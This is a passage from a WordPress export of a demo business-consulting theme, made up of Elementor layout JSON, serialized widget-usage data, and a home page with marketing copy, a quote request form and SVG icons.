center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"6315c9f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4d6ddf8","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#52C5B6","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8083fb5","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ddfb0e2","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ca6f1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cf7ecd","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"fc883e9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"42bd250","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"2285a93","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"90b3f9e","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"0748676","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"02b4af2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home5.png","id":2372},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"153c642","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"17a1aa0","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #52c5b6;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"66d8a4c","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"01b2f8e","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"388d72b","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"54dd58d","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"70d0b23","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"402a70c","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"df6115d","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"88e18e0","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#52C5B6","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6f19085","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"2d46fdb","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"d5f2cb2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"6e86112","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"6c1bc64","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"b727cfc","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"49fcb72","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"52b73d5","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"4307bab","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"ec48b7f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home5.jpg","id":2373},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"6b3ac15","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"942c291","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7f1a890","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"6612371","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ea8d29e","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"ad74664","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"a91c19d","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/</link>
		<pubDate>Tue, 22 Sep 2020 03:28:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1023</guid>
		<description></description>
		<content:encoded><![CDATA[<h2>professional consultations</h2>		
			<h2>Finance Planning, Execution & Strategy
</h2>		
		<p>We are boutique firm designed for Private Equity, Family Offices, and<br />Growth-Stage Companies seeking to maximize results</p>		
	        <a href="https://vimeo.com/87959439">
					        </a>
	        how we work	    
			<h2>Get Free Quote</h2>		
		It's our pleasure to have a chance to cooperate.		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f1536-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1536" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1536-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="email" name="your-phone" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Phone *" /></p>
<p><input type="email" name="your-subject" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Message..." /></p>
<p><button type="submit">submit now</button></p>
</form>		
	        Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"class="link-details"> Explore More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    